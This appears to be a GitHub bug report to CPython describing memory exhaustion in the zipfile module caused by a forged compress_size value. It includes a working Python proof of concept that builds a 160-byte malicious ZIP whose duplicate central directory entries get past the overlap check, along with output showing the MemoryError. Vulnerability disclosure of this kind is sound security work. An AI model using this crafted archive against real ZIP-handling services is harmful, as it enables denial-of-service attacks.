Skip to content

Memory Exhaustion in zipfile via Forged compress_size #151307

@DarkaMaul

Description

@DarkaMaul

Bug report

Bug description:

Summary

A short ZIP file forces Python's zipfile module to attempt a ~2 GiB heap allocation.

Details

ZipExtFile._read2() passes a user-controlled compress_size from the central directory to self._fileobj.read(n). On 3.14 builds, ZipExtFile.MAX_N caps a single request at 1 GiB. On 3.15, this was corrected to (1 << 31) - 1 = ~2 GiB. A 160-byte crafted ZIP claiming compress_size=0xFFFFFFFE triggers a ~1 GiB (3.14) or ~2 GiB (3.15) allocation attempt.
Note: The overlap check is bypassed using two CD entries with the same filename and header_offset=0, the first entry (forged sizes) gets _end_offset == header_offset, triggering only a warning.

Reproducer

"""
Memory exhaustion in zipfile via crafted compress_size field.
"""

import resource
import struct
import sys
import tempfile
import zipfile


CLAIMED_SIZE = 0xFFFF_FFFE
MEM_LIMIT = 256 * 1024 * 1024  # 256 MiB


def craft_malicious_zip(claimed_compress_size: int) -> bytes:
    """
    Build a minimal valid ZIP with two CD entries.
    """
    filename = b"a.txt"
    file_data = b"x"
    real_size = len(file_data)

    local_header = struct.pack(
        "<4s2B4HL2L2H",
        b"PK\x03\x04",
        20, 0, 0, 0, 0, 0, 0,
        real_size, real_size,
        len(filename), 0,
    )

    cd_offset = len(local_header) + len(filename) + len(file_data)

    cd_entry_forged = struct.pack(
        "<4s4B4HL2L5H2L",
        b"PK\x01\x02",
        20, 0, 20, 0,
        0, 0, 0, 0, 0,
        claimed_compress_size,
        claimed_compress_size,
        len(filename),
        0, 0, 0, 0, 0,
        0,
    )

    cd_entry_normal = struct.pack(
        "<4s4B4HL2L5H2L",
        b"PK\x01\x02",
        20, 0, 20, 0,
        0, 0, 0, 0, 0,
        real_size,
        real_size,
        len(filename),
        0, 0, 0, 0, 0,
        0,
    )

    real_cd_size = (
        len(cd_entry_forged) + len(filename)
        + len(cd_entry_normal) + len(filename)
    )

    eocd = struct.pack(
        "<4s4H2LH",
        b"PK\x05\x06",
        0, 0, 2, 2,
        real_cd_size, cd_offset, 0,
    )

    return (
        local_header + filename + file_data
        + cd_entry_forged + filename
        + cd_entry_normal + filename
        + eocd
    )


def main():
    malicious_zip = craft_malicious_zip(CLAIMED_SIZE)

    with tempfile.NamedTemporaryFile(suffix=".zip") as tmp:
        tmp.write(malicious_zip)
        tmp.flush()

        try:
            with zipfile.ZipFile(tmp.name, "r") as zf:
                forged = zf.filelist[0]
                with zf.open(forged) as f:
                    f.read()
        except MemoryError:
            print(
                f"MemoryError from {len(malicious_zip)}-byte ZIP "
                f"with compress_size={CLAIMED_SIZE:,}"
            )
            sys.exit(0)
        except Exception:
            print("BLOCKED: zipfile rejected forged compress_size")
            sys.exit(1)

    print("BLOCKED: no allocation error raised")
    sys.exit(1)


if __name__ == "__main__":
    resource.setrlimit(resource.RLIMIT_AS, (MEM_LIMIT, MEM_LIMIT))
    main()

Due to how RLIMIT works, that's better to run the poc in a container.

❯ docker run --rm -v "$(pwd)":/work -w /work python:3.14-slim python poc.py
/work/poc.py:92: UserWarning: Overlapped entries: 'a.txt' (possible zip bomb)
  with zf.open(forged) as f:
MemoryError from 160-byte ZIP with compress_size=4,294,967,294

Impact

Memory Exhaustion

Linked issues

#141713

/cc @serhiy-storchaka

CPython versions tested on:

3.15

Operating systems tested on:

macOS, Linux

Metadata

Metadata

Assignees

No one assigned

    Labels

    type-bugAn unexpected behavior, bug, or error
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions